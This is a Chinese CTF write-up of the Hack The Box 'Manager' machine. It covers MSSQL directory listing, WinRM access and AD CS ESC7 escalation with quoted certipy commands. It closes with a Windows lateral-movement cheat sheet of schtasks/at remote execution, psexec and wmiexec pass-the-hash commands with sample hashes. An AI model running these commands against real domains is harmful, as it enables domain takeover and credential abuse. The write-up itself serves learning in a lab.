假期打靶第一弹-Manager

HTB，启动！

靶机地址：https://app.hackthebox.com/machines/Manager

User Flag

拿到ip地址，先nmap乱扫一遍：

Host is up (0.39s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
80/tcp   open  http              Microsoft IIS httpd 10.0
|_http-title: Manager
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-02-02 21:18:46Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2024-02-02T21:20:27+00:00; +7h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
1433/tcp open  ms-sql-s          Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-02-02T12:29:19
|_Not valid after:  2054-02-02T12:29:19
|_ssl-date: 2024-02-02T21:20:27+00:00; +6h59m59s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2024-02-02T21:20:28+00:00; +6h59m57s from scanner time.
3269/tcp open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2024-02-02T21:20:25+00:00; +7h00m00s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 1s, median: 6h59m59s
| smb2-time:
|   date: 2024-02-02T21:19:48
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   383.31 ms 10.10.14.1 (10.10.14.1)
2   384.80 ms 10.10.11.236 (10.10.11.236)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.99 seconds

发现开放了http、sqlserver等服务，还是个域控，域名是dc01.manager.htb。

web界面如下，目测是个静态页面：

先扫一波看看：

啥也没有，那web打点的思路先放一下，跑下smb：

然后密码喷涂：

尝试列出共享目录：

用刚才喷涂出来的凭据登录之后啥都没有：

所以445端口暂时也没什么思路了，但是有用的是我们跑出来了两个用户名和密码，现在还有mssql服务，可以尝试渗透，再进行一次密码喷涂：

有戏，登录进去看看：

发现没有数据库，首先想到的肯定是命令执行，想通过xp_cmdshell执行命令发现没有权限：

文章：http://www.bmth666.cn/2023/08/06/MSSQL-%E6%95%B0%E6%8D%AE%E5%BA%93%E5%88%A9%E7%94%A8/

可以利用mssql去列出目录：EXEC master.sys.xp_dirtree 'C:\', 1, 1;

最终找到web目录下的一份源码，可以下载到本地，发现是个静态网站。

找到个配置文件：

nmap中扫描开放了WinRM服务，尝试连下，凭证就是刚才xml中的内容，成功拿到flag：

Root Flag

查看下用户组，发现当前用户在Certificate Service DCOM Access组中，并且提供CA服务，这波是DC上放CA，彳亍。

被搅屎了，第二天重置靶机后用certipy检测：

检测出ESC7，下面是关于此的描述：

ESC7
ESC7 is when a user has the Manage CA or Manage Certificates access right on a CA. There are no public techniques that can abuse the Manage Certificates access right for domain privilege escalation, but it can be used it to issue or deny pending certificate requests.

The “Certified Pre-Owned” whitepaper mentions that this access right can be used to enable the EDITF_ATTRIBUTESUBJECTALTNAME2 flag to perform the ESC6 attack, but this will not have any effect until the CA service (CertSvc) is restarted. When a user has the Manage CA access right, the user is also allowed to restart the service. However, it does not mean that the user can restart the service remotely. Furthermore, ESC6 might not work out of the box in most patched environments due to the May 2022 security updates.

Instead, I’ve found another technique that doesn’t require any service restarts or configuration changes.

Prerequisites

In order for this technique to work, the user must also have the Manage Certificates access right, and the certificate template SubCA must be enabled. With the Manage CA access right, we can fulfill these prerequisites.

The technique relies on the fact that users with the Manage CA and Manage Certificates access right can issue failed certificate requests. The SubCA certificate template is vulnerable to ESC1, but only administrators can enroll in the template. Thus, a user can request to enroll in the SubCA - which will be denied - but then issued by the manager afterwards.

If you only have the Manage CA access right, you can grant yourself the Manage Certificates access right by adding your user as a new officer.
>$ certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
>Certipy v4.0.0 - by Oliver Lyak (ly4k)

>[*] Successfully added officer 'John' on 'corp-DC-CA'
The SubCA template can be enabled on the CA with the -enable-template parameter. By default, the SubCA template is enabled.
>$ certipy ca -ca 'corp-DC-CA' -enable-template SubCA -username john@corp.local -password Passw0rd
>Certipy v4.0.0 - by Oliver Lyak (ly4k)

>[*] Successfully enabled 'SubCA' on 'corp-DC-CA'
Attack

If we have fulfilled the prerequisites for this attack, we can start by requesting a certificate based on the SubCA template.

This request will be denied, but we will save the private key and note down the request ID.
>$ certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
>Certipy v4.0.0 - by Oliver Lyak (ly4k)

>[*] Requesting certificate via RPC
>[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
>[*] Request ID is 785
>Would you like to save the private key? (y/N) y
>[*] Saved private key to 785.key
>[-] Failed to request certificate
With our Manage CA and Manage Certificates, we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter.
>$ certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
>Certipy v4.0.0 - by Oliver Lyak (ly4k)

>[*] Successfully issued certificate
And finally, we can retrieve the issued certificate with the req command and the -retrieve <request ID> parameter.
>$ certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785
>Certipy v4.0.0 - by Oliver Lyak (ly4k)

>[*] Rerieving certificate with ID 785
>[*] Successfully retrieved certificate
>[*] Got certificate with UPN 'administrator@corp.local'
>[*] Certificate has no object SID
>[*] Loaded private key from '785.key'
>[*] Saved certificate and private key to 'administrator.pfx'

首先创建一个officer，然后启用证书模板并请求证书，该请求将被拒绝，但我们将保存私钥并记下请求 ID：

签发所请求的证书，然后可以检索证书（签发过程可能失败，重试两次即可，但注意要保证证书的id一致）：

然后证书传递，生成一个Kerberos TGT票据和administrator的hash：

报错了，需要先和dc同步下时钟：

拿到管理员的hash值：

利用hash登录账户后，提权成功，拿到root flag：

Conclusion

一个内网渗透的小总结笔记：

一般内网渗透首先要搜集基本信息，来判断当前服务器的角色、网络环境等信息：

systeminfo #详细信息
net start #启动服务
tasklist #进程列表
schtasks #计划任务

然后收集网络架构相关信息：

ipconfig /all # 判断存在域-dns
net view /domain # 判断存在域
net time /domain # 判断主域
netstat -ano # 当前网络端口开放
nslookup # 域名解析

系统默认的用户身份：

Domain Admins：域管理员（默认对域控制器有完全控制权）
Domain Computers：域内机器
Domain Controllers：域控制器
Domain Guest：域访客，权限低
Domain Users：域用户
Enterprise Admins：企业系统管理员用户（默认对域控制器有完全控制权）

用户身份查询：

whoami /all 用户权限
net config workstation 登录信息
net user 本地用户
net localgroup 本地用户组
net user /domain 获取域用户信息
net group /domain 获取域用户组信息
wmic useraccount get /all 涉及域用户详细信息
net group "Domain Admins" /domain 查询域管理员账户
net group "Enterprise Admins" /domain 查询管理员用户组
net group "Domain Controllers" /domain 查询域控制器

常见的凭据信息收集：

1.站点源码备份文件、数据库备份文件等
2.各类数据库 Web 管理入口，如 PHPMyAdmin
3.浏览器保存密码、浏览器 Cookies
4.其他用户会话、3389 和 ipc$连接记录、回收站内容
5.Windows 保存的 WIFI 密码
6.网络内部的各种帐号和密码，如：Email、VPN、FTP、OA 等

横向渗透明文传递的手法：拿到一台主机后，通过本地信息收集用户凭证，可以利用at和schtasks等横向渗透。

利用流程：

建立 IPC 链接到目标主机
拷贝要执行的命令脚本到目标主机
查看目标时间，创建计划任务（at、schtasks）定时执行拷贝到的脚本
删除 IPC 链接

net use \\server\ipc$"password" /user:username # 工作组
net use \\server\ipc$"password" /user:domain\username #域内
dir \\xx.xx.xx.xx\C$\ # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat # 下载文件
copy 1.bat \\xx.xx.xx.xx\C$ # 复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del # 删除 IPC
net view xx.xx.xx.xx # 查看对方共享

#at < Windows2012
net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\ad
ministrator # 建立 ipc 连接：
copy add.bat \\192.168.3.21\c$ #拷贝执行文件到目标机器
at \\192.168.3.21 15:47 c:\add.bat #添加计划任务

#schtasks >=Windows2012
net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\ad
ministrator # 建立 ipc 连接：
copy add.bat \\192.168.3.32\c$ #复制文件到其 C 盘
schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务

schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务
schtasks /delete /s 192.168.3.21 /tn adduser /f#删除 adduser 任务

IPC的常见错误代码：

（1）5：拒绝访问，可能是使用的用户不是管理员权限，需要先提升权限
（2）51：网络问题，Windows 无法找到网络路径
（3）53：找不到网络路径，可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有
防火墙等问题
（4）67：找不到网络名，本地 Lanmanworkstation 服务未启动，目标删除 ipc$
（5）1219：提供的凭据和已存在的凭据集冲突，说明已建立 IPC$，需要先删除
（6）1326：账号密码错误
（7）1792：目标 NetLogon 服务未启动，连接域控常常会出现此情况
（8）2242：用户密码过期，目标有账号策略，强制定期更改密码

利用SMB（445端口）服务，可以通过哈希传递或者明文传递来远程执行：

#psexec 第一种：先有 ipc 链接，psexec 需要明文或 hash 传递
net use \\192.168.3.32\ipc$ "admin!@#45" /user:ad
ministrator
psexec \\192.168.3.32 -s cmd # 需要先有 ipc 链接 -s 以 System 权限运行

#psexec 第二种：不用建立 IPC 直接提供明文账户密码
psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

还可以通过WMI服务（139端口）利用，此方法不会在目标日志系统留下痕迹：

#自带 WMIC 明文传递 无回显
wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c 
ipconfig >C:\1.txt"

#自带 cscript 明文传递 有回显
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

#套件 impacket wmiexec 明文或 hash 传递 有回显 exe 版本
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

个人感觉还是impacket好使。

Kerberos协议：

客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密，发送给 kdc，kdc 对用户进行检测，成功之后创建 TGT。
将 TGT 进行加密签名返回给客户机器，只有域用户 krbtgt 才能读取 kerberos 中 TGT 数据，然后客户机将 TGT 发送给域控制器 KDC 请求 TGS（票证授权服务）票证，并且对 TGT 进行检测
检测成功之后，将目标服务账户的 NTLM 以及 TGT 进行加密，将加密后的结果返回给客户机。

PTH 在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash访问远程主机或服务，而不用提供明文密码。如果禁用了 ntlm 认证，PsExec 无法利用获得的 ntlm hash 进行远程连接，但是使用 mimikatz 还是可以攻击成功。对于 8.1/2012r2，安装补丁 kb2871997 的 Win 7/2008r2/8/2012 等，可以使用 AES keys代替 NT hash 来实现 ptk 攻击。

pth：没打补丁用户都可以连接，打了补丁只能 administrator 连接

ptk：打了补丁才能用户都可以连接，采用 aes256 连接

还有黄金票据、白银票据以及若干提权手法，遇到了再总结。